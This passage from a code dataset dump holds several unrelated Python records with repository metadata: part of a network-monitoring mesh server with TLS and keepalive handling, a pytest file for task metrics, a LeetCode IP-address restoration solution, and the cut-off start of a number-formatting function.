server_client['IP_ADDRESS'] = \"0.0.0.0\"\n\n # Telling every client to update their config, as this client is gone and his real IP is no longer kown for sure.\n # It will trigger on the client, a termination of the running CONNECTORS associated with that IP and prevent it from restarting because \"0.0.0.0\" is use as a condition in\n # process_and_thread to not launch a CONNECTOR\n for server_client in _config['SERVER_CLIENT']:\n\n # If there is an existing OVERRIDE_DST_NODE_IP, do not update the IP\n skip_flag = False\n if 'OVERRIDE_DST_NODE_IP' in server_client:\n if server_client['OVERRIDE_DST_NODE_IP']:\n for override_ip_client_uid in server_client['OVERRIDE_DST_NODE_IP']:\n if override_ip_client_uid == obj_client.client_uid:\n skip_flag = True\n\n if not skip_flag:\n # Make sure we are not updating the dynamic client itself\n if not obj_client.client_uid == server_client['UID']:\n if not server_client['UID'] in dict_of_commands_for_network_clients:\n dict_of_commands_for_network_clients[server_client['UID']] = []\n dict_of_commands_for_network_clients[server_client['UID']].append(\n {\"ACTION\": \"UPDATED_CONFIG\", \"ELEMENT\": \"CLIENT_IP\", \"CLIENT_UID\": obj_client.client_uid,\n \"IP_ADDRESS\": \"0.0.0.0\"})\n\n\ndef server_save_thread_status(obj_client, received_data):\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - RECEIVED A COMMAND TO SAVE THREAD STATUS\")\n obj_client.thread_status = received_data['PAYLOAD']\n\n\nclass Handler(StreamRequestHandler):\n def handle(self):\n address = self.client_address\n sckt = self.connection\n _config = self.server._config\n\n threading.current_thread().name = f\"CONTROL CHANNEL CLIENT:{address}\"\n\n dict_of_commands_for_network_clients = self.server.dict_of_commands_for_network_clients\n dict_of_clients = self.server.dict_of_clients\n conn_db = self.server.conn_db\n _dict_by_node_generated_config = self.server.dict_by_node_generated_config\n dict_of_client_pending_acceptance = self.server.dict_of_client_pending_acceptance\n threads_n_processes = 
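# server_forget_dynamic_client_ip() rolls a dynamic client back to "0.0.0.0"
# and queues an UPDATED_CONFIG action for every other client that does not
# pin the address via OVERRIDE_DST_NODE_IP. The selection logic, isolated as
# a hypothetical generator:
def clients_to_notify(server_clients, gone_uid):
    for sc in server_clients:
        if sc["UID"] == gone_uid:
            continue  # never notify the departed client itself
        if gone_uid in (sc.get("OVERRIDE_DST_NODE_IP") or []):
            continue  # pinned destination IP: leave this client's config alone
        yield sc["UID"]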
self.server.threads_n_processes\n\n current_thread = threading.current_thread()\n log.debug(current_thread)\n\n uid = address[0]\n dict_of_clients[uid] = cc_client(status=\"CONNECTING\", status_since=datetime.now(),\n status_explanation=\"NOT YET AUTHENTICATED\", client_uid=\"UNKNOWN\",\n bool_dynamic_client=False, tcp_port=address[1], ip_address=address[0])\n\n try:\n while True:\n # no need to loop if no server_client\n if \"SERVER_CLIENT\" in _config:\n received_data = \"\"\n received_data = sock_rcv(sckt)\n\n if received_data is None:\n received_data = sock_rcv(sckt)\n\n if received_data is None:\n server_log.debug(f\"CONTEXT: {dict_of_clients[uid].client_uid} - INVALID DATA RECEIVED\")\n dict_of_clients[uid].status_explanation = \"CONNECTION RESET BY PEER\"\n server_log.error(f\"CONNECTION RESET BY PEER: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n break\n else:\n # Log the command that was received\n server_log.debug(\n f\"CONTEXT: {dict_of_clients[uid].client_uid} - RECEIVED {received_data['COMMAND']}\")\n\n if received_data['COMMAND'] == \"AUTH\":\n\n if not server_auth(received_data, dict_of_clients[uid], _config,\n dict_of_clients[uid].ip_address, dict_of_commands_for_network_clients, sckt,\n _dict_by_node_generated_config, dict_of_client_pending_acceptance, threads_n_processes):\n return\n\n # Now that we know the identity of the client connecting, we can update the dictionary of client objects\n new_uid = dict_of_clients[uid].client_uid\n dict_of_clients[new_uid].client_uid = new_uid\n dict_of_clients[new_uid].status = dict_of_clients[uid].status\n dict_of_clients[new_uid].bool_dynamic_client = dict_of_clients[uid].bool_dynamic_client\n dict_of_clients[new_uid].status_since = dict_of_clients[uid].status_since\n dict_of_clients[new_uid].status_explanation = dict_of_clients[uid].status_explanation\n dict_of_clients[new_uid].clock_skew_in_seconds = dict_of_clients[uid].clock_skew_in_seconds\n dict_of_clients[new_uid].syntraf_version = dict_of_clients[uid].syntraf_version\n dict_of_clients[new_uid].ip_address = address[0]\n dict_of_clients[new_uid].tcp_port = address[1]\n dict_of_clients.pop(uid)\n uid = new_uid\n\n elif received_data['COMMAND'] == \"SAVE_METRIC\":\n server_save_metric(dict_of_clients[uid], conn_db, received_data,\n dict_of_clients[uid].ip_address, sckt)\n\n elif received_data['COMMAND'] == \"SAVE_STATS_METRIC\":\n server_save_stats_metric(dict_of_clients[uid], received_data)\n\n elif received_data['COMMAND'] == \"SAVE_THREAD_STATUS\":\n server_save_thread_status(dict_of_clients[uid], received_data)\n\n elif received_data['COMMAND'] == \"SYSTEM_INFOS\":\n server_save_system_infos(dict_of_clients[uid], received_data)\n\n elif received_data['COMMAND'] == \"AWAITING_COMMAND\":\n server_awaiting_commands(dict_of_clients[uid].client_uid, dict_of_commands_for_network_clients,\n sckt)\n\n elif received_data['COMMAND'] == \"HEARTBEAT\":\n pass\n\n else:\n print(\"UNKNOWN COMMAND:\", received_data['COMMAND'])\n else:\n time.sleep(2)\n\n except socket.timeout as exc:\n server_log.error(f\"SOCKET TIMEOUT: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n dict_of_clients[uid].status_explanation = \"SOCKET TIMEOUT\"\n except json.JSONDecodeError as exc:\n server_log.error(f\"JSON DECODING FAILED FOR STRING\")\n except OSError as exc:\n if exc.errno == 32: # BROKEN PIPE, THE OTHER END HAS GONE AWAY\n dict_of_clients[uid].status_explanation = \"BROKEN PIPE\"\n server_log.error(f\"BROKEN PIPE: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n # 
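# After AUTH, the handler above re-keys dict_of_clients from the transient
# address-based uid to the real client_uid by copying fields one at a time.
# With plain dict semantics, dict.pop() moves the whole entry in one step --
# note, though, that unlike the field-by-field copy this replaces any
# pre-existing entry under the new key wholesale:
def rekey(d, old_key, new_key):
    d[new_key] = d.pop(old_key)
    return new_key

# uid = rekey(dict_of_clients, uid, dict_of_clients[uid].client_uid)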
CONNECTION RESET BY PEER\n elif exc.errno == 104:\n dict_of_clients[uid].status_explanation = \"CONNECTION RESET BY PEER\"\n server_log.error(f\"CONNECTION RESET BY PEER: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n elif exc.errno == 113:\n dict_of_clients[uid].status_explanation = \"NO ROUTE TO HOST\"\n server_log.error(f\"NO ROUTE TO HOST: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n # CONNECTION TIMEOUT\n elif exc.errno == 110:\n dict_of_clients[uid].status_explanation = \"CONNECTION TIMEOUT\"\n server_log.error(f\"CONNECTION TIMEOUT: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n # FOR WINDOWS [WinError 10053] #An established connection was aborted by the software in your host machine\n elif exc.errno == 10053:\n dict_of_clients[uid].status_explanation = \"CONNECTION ABORTED\"\n server_log.error(f\"CONNECTION ABORTED: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n # FOR WINDOWS [WinError 10054]\n elif exc.errno == 10054:\n dict_of_clients[uid].status_explanation = \"CONNECTION RESET BY PEER\"\n server_log.error(f\"CONNECTION RESET BY PEER: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n elif exc.errno == 10057: # FOR WINDOWS [WinError 10057]\n dict_of_clients[uid].status_explanation = \"SOCKET IS NOT CONNECTED\"\n server_log.error(\n f\"{type(exc).__name__.upper()}:{exc.errno}: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n else:\n dict_of_clients[uid].status_explanation = \"UNKNOWN OSError\"\n server_log.error(f\"UNHANDLE OSError (st_mesh:sock_rcv): {dict_of_clients[uid].ip_address}:\", exc,\n exc.errno, exc.strerror)\n except Exception as exc:\n dict_of_clients[uid].status_explanation = \"UNKNOWN\"\n server_log.error(f\"Handler:handle:{type(exc).__name__}:{exc}\", exc_info=True)\n\n finally:\n # The socket on the other end is probably closed\n server_log.error(f\"CLIENT: {dict_of_clients[uid].ip_address} DISCONNECTED\")\n\n try:\n # If this is a dynamic client, once disconnected, we should forget about the ip address\n server_forget_dynamic_client_ip(dict_of_clients[uid], _config, dict_of_commands_for_network_clients)\n\n # Updating the status\n # We don't want to overwrite a reason for failed authentication, so we overwrite only when the client was connected\n if \"CONNECTED\" in dict_of_clients[uid].status:\n dict_of_clients[uid].status = \"DISCONNECTED\"\n dict_of_clients[uid].status_since = datetime.now()\n\n # Reinitializing stats array so that the sparklines graphes does not appear in the webui\n dict_of_clients[uid].system_stats['if_pct_usage_rx'] = []\n dict_of_clients[uid].system_stats['if_pct_usage_tx'] = []\n dict_of_clients[uid].system_stats['mem_pct_free'] = []\n dict_of_clients[uid].system_stats['cpu_pct_usage'] = []\n\n sckt.close()\n\n except Exception as e:\n server_log.error(\n f\"AN ERROR OCCURRED WHILE FREEING RESOURCE FOR THE CLIENT: {dict_of_clients[uid].client_uid}/{dict_of_clients[uid].ip_address}\")\n\n\nclass SSL_TCPServer(TCPServer):\n def __init__(self,\n server_address,\n RequestHandlerClass,\n certfile,\n keyfile,\n bind_and_activate=True,\n ssl_version=ssl.PROTOCOL_TLSv1):\n TCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate)\n self.certfile = certfile\n self.keyfile = keyfile\n self.ssl_version = ssl_version\n\n\n def get_request(self):\n newsocket, fromaddr = self.socket.accept()\n connstream = ssl.wrap_socket(newsocket,\n server_side=True,\n certfile=self.certfile,\n keyfile=self.keyfile,\n #ssl_version=self.ssl_version,\n 
cert_reqs=ssl.CERT_NONE,\n do_handshake_on_connect=True)\n return connstream, fromaddr\n\n def get_config(self):\n return self._config\n\nclass SSLnThreadingTCPServer(ThreadingMixIn, SSL_TCPServer):\n # Make sure all the client are close when server is closed\n daemon_threads = True\n\n\n#################################################################################\n### MESH SERVER SOCKET LISTENER\n### http://www.gevent.org/api/gevent.server.html\n### http://www.gevent.org/api/gevent.baseserver.html#gevent.baseserver.BaseServer\n### https://github.com/veryhappythings/gevent-ssl-example/blob/master/stateful_server.py\n### https://dadruid5.com/2018/07/30/running-a-gevent-streamserver-in-a-thread-for-maximum-control/#:~:text=StreamServer%20Gevent%20maintains%20a%20server%20through%20gevent.server.StreamServer.%20This,pool%20for%20controlling%20the%20number%20of%20connections%20created%3A\n### https://stackoverflow.com/questions/21631799/how-can-i-pass-parameters-to-a-requesthandler\n#################################################################################\ndef server(_config, threads_n_processes, stop_thread, dict_by_node_generated_config, obj_stats, conn_db,\n dict_of_commands_for_network_clients, dict_of_clients, dict_of_client_pending_acceptance):\n # Generating the rsa keypair for iperf3 authentication\n gen_rsa_iperf3(server_log, _config)\n gen_user_pass_iperf3(server_log, _config)\n _config['SERVER']['IPERF3_PASSWORD_HASH'] = gen_iperf3_password_hash(_config['SERVER']['IPERF3_USERNAME'],\n _config['SERVER']['IPERF3_PASSWORD'])\n server_address = (_config['SERVER']['BIND_ADDRESS'], int(_config['SERVER']['SERVER_PORT']))\n\n # Avoid \"Address already in use\" when restarting server\n TCPServer.allow_reuse_address = True\n\n try:\n # Validating if we need to wrap the socket with legit cert or self-signed\n self_signed_flag = True\n if 'SERVER_X509_SELFSIGNED' in _config['SERVER']:\n if _config['SERVER']['SERVER_X509_SELFSIGNED'] == \"NO\":\n self_signed_flag = False\n if not self_signed_flag:\n server_log.debug(f\"CONTROL CHANNEL SERVER SOCKET CREATED\")\n tcp_server = SSLnThreadingTCPServer(server_address, Handler,\n keyfile=_config['SERVER']['SERVER_X509_PRIVATE_KEY'],\n certfile=_config['SERVER']['SERVER_X509_CERTIFICATE'],\n bind_and_activate=True)\n\n server_log.debug(\n f\"BINDING CONTROL CHANNEL SERVER SSL SOCKET TO '{_config['SERVER']['BIND_ADDRESS']}:{_config['SERVER']['SERVER_PORT']}' SUCCESSFUL\")\n server_log.debug(f\"CONTROL CHANNEL SERVER SSL SOCKET LISTENING\")\n else:\n\n server_log.debug(f\"CONTROL CHANNEL SERVER SOCKET CREATED\")\n tcp_server = SSLnThreadingTCPServer(server_address, Handler,\n keyfile=os.path.join(\n DefaultValues.DEFAULT_SERVER_X509_SELFSIGNED_DIRECTORY,\n \"private_key_server.pem\"),\n certfile=os.path.join(\n DefaultValues.DEFAULT_SERVER_X509_SELFSIGNED_DIRECTORY,\n \"certificate_server.pem\"), bind_and_activate=True)\n\n server_log.debug(\n f\"BINDING CONTROL CHANNEL SERVER SSL SOCKET TO '{_config['SERVER']['BIND_ADDRESS']}:{_config['SERVER']['SERVER_PORT']}' SUCCESSFUL\")\n server_log.debug(f\"CONTROL CHANNEL SERVER SSL SOCKET LISTENING\")\n\n tcp_server.dict_by_node_generated_config = dict_by_node_generated_config\n tcp_server.conn_db = conn_db\n tcp_server.dict_of_commands_for_network_clients = dict_of_commands_for_network_clients\n tcp_server.dict_of_clients = dict_of_clients\n tcp_server.dict_of_client_pending_acceptance = dict_of_client_pending_acceptance\n tcp_server._config = _config\n tcp_server.threads_n_processes = 
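# get_request() above relies on ssl.wrap_socket(), which was deprecated in
# Python 3.7 and removed in 3.12. The SSLContext equivalent, under the same
# server-side / CERT_NONE assumptions as the original:
import ssl

def make_server_context(certfile, keyfile):
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(certfile=certfile, keyfile=keyfile)
    ctx.verify_mode = ssl.CERT_NONE  # the original does not request client certs
    return ctx

# in get_request():  connstream = context.wrap_socket(newsocket, server_side=True)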
threads_n_processes\n tcp_server.serve_forever()\n\n except OSError as msg:\n server_log.error(\n f\"UNABLE TO START SERVER ON '{_config['SERVER']['BIND_ADDRESS']}:{_config['SERVER']['SERVER_PORT']}' : {msg}\")\n sys.exit()\n\n except Exception as exc:\n server_log.error(f\"server:{type(exc).__name__}:{exc}\", exc_info=True)\n print(traceback.format_exc())\n sys.exit()\n\n\ndef set_tcp_ka(sckt, log):\n sckt.settimeout(60)\n \"\"\"\n Setting socket parameters\n SO_KEEPALIVE: activate keepalive\n TCP_KEEPCNT, Kernel 2.4 : overrides tcp_keepalive_probes\n Gets or sets the number of TCP keep alive probes that will be sent before the connection is terminated. It is illegal to set TCP_KEEPCNT to a value greater than 255. (Starting with Windows 10, version 1703.)\n TCP_KEEPIDLE, Kernel 2.4 : overrides tcp_keepalive_time\n Gets or sets the number of seconds a TCP connection will remain idle before keepalive probes are sent to the remote. (This option is available starting with Windows 10, version 1709.)\n TCP_KEEPINTVL, Kernel 2.4 : overrides tcp_keepalive_intvl\n Gets or sets the number of seconds a TCP connection will wait for a keepalive response before sending another keepalive probe. (This option is available starting with Windows 10, version 1709.)\n SIO_KEEPALIVE_VALS: WINDOWS ONLY\n enables or disables the per-connection setting of the TCP keep-alive option which specifies the TCP keep-alive timeout and interval.\n onoff;\n keepalivetime;\n keepaliveinterval;\n\n TCP_USER_TIMEOUT (rfc5482), Kernel 2.6.37 :\n\n https://man7.org/linux/man-pages/man7/tcp.7.html\n\n \"\"\"\n\n # SO_TIMEOUT\n\n # Platform independent SO_KEEPALIVE\n keepalive_before = sckt.getsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE)\n sckt.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n keepalive_after = sckt.getsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE)\n log.debug(f\"ENABLING SO_KEEPALIVE ON SOCKET. FROM '{keepalive_before}' to '{keepalive_after}'\")\n\n # # Platform independent TCP_NODELAY\n # nodelay_before = sckt.getsockopt(socket.SOL_SOCKET, socket.TCP_NODELAY)\n # sckt.setsockopt(socket.SOL_SOCKET, socket.TCP_NODELAY, 1)\n # nodelay_after = sckt.getsockopt(socket.SOL_SOCKET, socket.TCP_NODELAY)\n # log.debug(f\"ENABLING TCP_NODELAY ON SOCKET. 
FROM '{nodelay_before}' to '{nodelay_after}'\")\n\n platform = sys.platform\n\n \"\"\"\n The following values start the keepalive after 1 second (ka_after_idle_sec) of idleness,\n then sends a keepalive ping once every 2 seconds (ka_interval_sec),\n and closes the connection after 5 failed ping (ka_max_fails), or 10 seconds\"\n \"\"\"\n ka_after_idle_sec = 1\n ka_interval_sec = 2\n ka_max_fails = 5\n tcp_user_timeout = 1\n tcp_buffer = 0\n\n if platform == \"linux\":\n ka_after_idle_sec_before = sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE)\n ka_interval_sec_before = sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL)\n ka_max_fails_before = sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT)\n tcp_user_timeout_before = sckt.getsockopt(socket.SOL_SOCKET, socket.TCP_USER_TIMEOUT)\n tcp_buffer_before = sckt.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF)\n\n sckt.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, ka_after_idle_sec)\n sckt.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, ka_interval_sec)\n sckt.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, ka_max_fails)\n sckt.setsockopt(socket.SOL_SOCKET, socket.TCP_USER_TIMEOUT, tcp_user_timeout)\n sckt.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, tcp_buffer)\n\n ka_after_idle_sec_after = sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE)\n ka_interval_sec_after = sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL)\n ka_max_fails_after = sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT)\n tcp_user_timeout_after = sckt.getsockopt(socket.SOL_SOCKET, socket.TCP_USER_TIMEOUT)\n tcp_buffer_after = sckt.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF)\n\n log.debug(f\"MODIFYING SO_SNDBUF ON SOCKET FROM '{tcp_buffer_before}' to '{tcp_buffer_after}'\")\n log.debug(\n f\"MODIFYING TCP_USER_TIMEOUT ON SOCKET FROM '{tcp_user_timeout_before}' to '{tcp_user_timeout_after}'\")\n log.debug(f\"MODIFYING TCP_KEEPIDLE ON SOCKET FROM '{ka_after_idle_sec_before}' to '{ka_after_idle_sec_after}'\")\n log.debug(f\"MODIFYING TCP_KEEPINTVL ON SOCKET FROM '{ka_interval_sec_before}' to '{ka_interval_sec_after}'\")\n log.debug(f\"MODIFYING TCP_KEEPCNT ON SOCKET FROM '{ka_max_fails_before}' to '{ka_max_fails_after}'\")\n\n # TODO\n elif platform == \"darwin\":\n pass\n # TCP_CONNECTIONTIMEOUT\n # TCP_RXT_CONNDROPTIME\n # sends a keepalive ping once every 3 seconds (interval_sec)\n # \"\"\"\n # # scraped from /usr/include, not exported by python's socket module\n # TCP_KEEPALIVE = 0x10\n # sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n # sock.setsockopt(socket.IPPROTO_TCP, TCP_KEEPALIVE, interval_sec)\n\n elif platform == \"win32\":\n # Enable TCP socket keepalive with (on/off, keep alive time, keep alive interval)\n log.debug(f\"MODIFYING TCP SOCKET PARAMETERS FOR WIN32.\")\n log.debug(\n f\"BEFORE: TCP_KEEPIDLE --> {sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE)}, TCP_KEEPINTVL --> {sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL)}, TCP_KEEPCNT --> {sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT)}\")\n sckt.ioctl(socket.SIO_KEEPALIVE_VALS, (1, ka_after_idle_sec * 1000, ka_interval_sec * 1000))\n log.debug(\n f\"AFTER: TCP_KEEPIDLE --> {sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE)}, TCP_KEEPINTVL --> {sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL)}, TCP_KEEPCNT --> {sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT)}\")\n\n\n\n\n\ndef update_config(data, _config):\n # Updating config (LISTENERS AND CONNECTORS)\n new_config = {'LISTENERS': 
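# set_tcp_ka() branches per platform; the Linux branch boils down to a few
# setsockopt calls. A portable sketch with hasattr guards, since TCP_KEEPIDLE
# and friends are not exposed on every platform. Note that TCP_USER_TIMEOUT
# is a TCP-level option expressed in milliseconds (the code above sets it at
# SOL_SOCKET level with a value of 1):
import socket

def enable_keepalive(sck, idle=1, interval=2, max_fails=5):
    sck.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    if hasattr(socket, "TCP_KEEPIDLE"):
        sck.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, idle)
    if hasattr(socket, "TCP_KEEPINTVL"):
        sck.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, interval)
    if hasattr(socket, "TCP_KEEPCNT"):
        sck.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, max_fails)
    if hasattr(socket, "TCP_USER_TIMEOUT"):
        sck.setsockopt(socket.IPPROTO_TCP, socket.TCP_USER_TIMEOUT, 10_000)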
data['PAYLOAD']['LISTENERS'], 'CONNECTORS': data['PAYLOAD']['CONNECTORS']}\n\n # Updating CLIENT and GLOBAL config (must be careful, there is already config in this clause)\n _config['CLIENT']['IPERF3_USERNAME'] = data['PAYLOAD']['CLIENT']['IPERF3_USERNAME']\n _config['CLIENT']['IPERF3_PASSWORD'] = data['PAYLOAD']['CLIENT']['IPERF3_PASSWORD']\n _config['CLIENT']['IPERF3_HASH'] = data['PAYLOAD']['CLIENT']['IPERF3_PASSWORD_HASH']\n _config['GLOBAL']['IPERF3_TIME_SKEW_THRESHOLD'] = data['PAYLOAD']['GLOBAL']['IPERF3_TIME_SKEW_THRESHOLD']\n _config.update(new_config)\n\n\ndef save_credentials(data, _config):\n with open(os.path.join(_config['GLOBAL']['IPERF3_RSA_KEY_DIRECTORY'], 'private_key_iperf_client.pem'), 'wb') as f:\n f.write(data['PAYLOAD']['CLIENT']['RSA_KEY_LISTENERS'].encode())\n\n with open(os.path.join(_config['GLOBAL']['IPERF3_RSA_KEY_DIRECTORY'], 'public_key_iperf_client.pem'), 'wb') as f:\n f.write(data['PAYLOAD']['CLIENT']['RSA_KEY_CONNECTORS'].encode())\n\n try:\n with open(os.path.join(_config['GLOBAL']['IPERF3_RSA_KEY_DIRECTORY'], 'credentials.csv'), 'w') as f:\n f.write(_config['CLIENT']['IPERF3_USERNAME'] + \",\" + _config['CLIENT']['IPERF3_HASH'])\n\n except Exception as exc:\n server_log.error(\n f\"server(): AN ERROR OCCURED WHILE WRITING IPERF3 CREDENTIALS\")\n\n\ndef is_valid_server_client(_config, uid, socket):\n for server_client in _config['SERVER_CLIENT']:\n if server_client['UID'] == uid:\n return True\n return False\n","repo_name":"lbsou/syntraf","sub_path":"lib/st_mesh.py","file_name":"st_mesh.py","file_ext":"py","file_size_in_byte":65872,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"29253834037","text":"import asyncio\nfrom unittest.mock import Mock\n\nimport pytest\n\nfrom maps_adv.common.helpers import dt\nfrom maps_adv.warden.client.lib import PeriodicalTask\nfrom maps_adv.warden.client.lib.exceptions import (\n Conflict,\n TaskTypeAlreadyAssigned,\n TooEarlyForNewTask,\n)\n\npytestmark = [pytest.mark.asyncio]\n\n\nasync def test_works_correctly_without_sensors(mocker, client_factory):\n mocker.patch.object(PeriodicalTask, \"_relaunch_interval_after_exception\", new=0)\n\n task = PeriodicalTask(\"no_sensors\", Mock([asyncio.sleep(0.1)]))\n\n try:\n await task(client_factory)\n except Exception:\n pytest.fail(\"Should not raise\")\n\n\nasync def test_initiates_metric_group_empty(periodical_task, metric_group):\n periodical_task(Mock())\n\n assert metric_group.serialize(\"azaza\") == []\n\n\n@pytest.mark.parametrize(\n \"side_effect, task_status\",\n [\n ([asyncio.sleep(0.1)], \"requested\"),\n ([asyncio.sleep(0.1)], \"accepted\"),\n ([asyncio.sleep(0.1)], \"completed\"),\n (asyncio.TimeoutError(), \"failed (timeout)\"),\n (Conflict(), \"failed (conflict)\"),\n (TaskTypeAlreadyAssigned(), \"failed (conflict)\"),\n (\n TooEarlyForNewTask(\n next_try_proto_dt=dt(\"2020-10-01 18:00:00\", as_proto=True)\n ),\n \"failed (conflict)\",\n ),\n (Exception, \"failed\"),\n ],\n)\nasync def test_composes_sensors_with_correct_data(\n side_effect, task_status, client_factory, periodical_task, metric_group\n):\n task = periodical_task(Mock(side_effect=side_effect))\n\n await task(client_factory)\n\n assert {\n \"labels\": {\n \"metric_group\": \"azaza\",\n \"task_name\": \"task_1\",\n \"task_status\": task_status,\n },\n \"type\": \"RATE\",\n \"value\": 1,\n } in metric_group.serialize(\"azaza\")\n\n\nasync def test_increments_counters_correctly_each_task_launch(\n client_factory, periodical_task, 
metric_group\n):\n task = periodical_task(Mock(side_effect=[asyncio.TimeoutError, asyncio.sleep(0.1)]))\n\n await task(client_factory)\n await task(client_factory)\n\n assert {\n s[\"labels\"][\"task_status\"]: s[\"value\"] for s in metric_group.serialize(\"azaza\")\n } == {\"requested\": 2, \"accepted\": 2, \"failed (timeout)\": 1, \"completed\": 1}\n\n\nasync def test_counts_every_task_separately(\n client_factory, periodical_task, metric_group\n):\n task1 = periodical_task(Mock(side_effect=[asyncio.sleep(0.1)]), name=\"task1\")\n task2 = periodical_task(Mock(side_effect=Conflict()), name=\"task2\")\n\n await task1(client_factory)\n await asyncio.sleep(0.1)\n await task2(client_factory)\n\n assert [\n dict(\n task_name=s[\"labels\"][\"task_name\"],\n task_status=s[\"labels\"][\"task_status\"],\n value=s[\"value\"],\n )\n for s in metric_group.serialize(\"azaza\")\n ] == [\n {\"task_name\": \"task1\", \"task_status\": \"requested\", \"value\": 1},\n {\"task_name\": \"task1\", \"task_status\": \"accepted\", \"value\": 1},\n {\"task_name\": \"task1\", \"task_status\": \"completed\", \"value\": 1},\n {\"task_name\": \"task2\", \"task_status\": \"requested\", \"value\": 1},\n {\"task_name\": \"task2\", \"task_status\": \"accepted\", \"value\": 1},\n {\"task_name\": \"task2\", \"task_status\": \"failed (conflict)\", \"value\": 1},\n ]\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/task_master/test_sensors.py","file_name":"test_sensors.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31098781381","text":"'''\r\nGiven a string containing only digits, restore it by returning all possible valid IP address combinations.\r\n\r\nExample:\r\n\r\nInput: \"25525511135\"\r\nOutput: [\"255.255.11.135\", \"255.255.111.35\"]\r\n'''\r\n\r\n#BackTrack method\r\nclass Solution:\r\n def restoreIpAddresses(self, s: str) -> List[str]:\r\n result = []\r\n \r\n def getSubAddress(curIP, s, lvl):\r\n if lvl == 0 and s == \"\":\r\n result.append(curIP[:-1])\r\n elif lvl != 0:\r\n for i in range(0, min(3, len(s))):\r\n if i > 0 and s[0] == \"0\":\r\n continue\r\n if 0 <= int(s[0:i+1]) <= 255:\r\n getSubAddress(curIP + s[0:i+1] + \".\", s[i+1:], lvl-1)\r\n \r\n lvl = 4\r\n getSubAddress(\"\", s, lvl)\r\n \r\n return result\r\n","repo_name":"XiaoLing941212/Summer-Leet-Code","sub_path":"7.8 - 93, 516/93. Restore IP Addresses.py","file_name":"93. Restore IP Addresses.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6355211724","text":"def makeGoodNumbers(input_string):\n def make_good_number(left_part, right_part):\n if 2 <= len(left_part) <= 4 and 2 <= len(right_part) <= 5:\n return f\"{left_part.zfill(4)}/{right_part.zfill(5)}\"\n else:\n return \"Некорректный формат номера\"\n\n good_numbers = []\n words = input_string.split()\n\n for word in words:\n if \"/\" in word:\n left_part, right_part = word.split(\"/\")\n good_number = make_good_number(left_part, right_part)\n if good_number:\n good_numbers.append(good_number)\n\n return good_numbers\n\n\nif __name__ == '__main__':\n\n input_string = \"Адрес 5467/456. 
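# The Solution class in "93. Restore IP Addresses.py" above annotates with
# List but never imports it, so the file only runs inside LeetCode's harness.
# A self-contained variant of the same backtracking:
from typing import List

def restore_ip_addresses(s: str) -> List[str]:
    result = []

    def backtrack(cur, rest, parts_left):
        if parts_left == 0:
            if rest == "":
                result.append(cur[:-1])  # drop the trailing dot
            return
        for i in range(1, min(3, len(rest)) + 1):
            part = rest[:i]
            if i > 1 and part[0] == "0":  # no leading zeros
                continue
            if int(part) <= 255:
                backtrack(cur + part + ".", rest[i:], parts_left - 1)

    backtrack("", s, 4)
    return result

# restore_ip_addresses("25525511135") -> ['255.255.11.135', '255.255.111.35']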
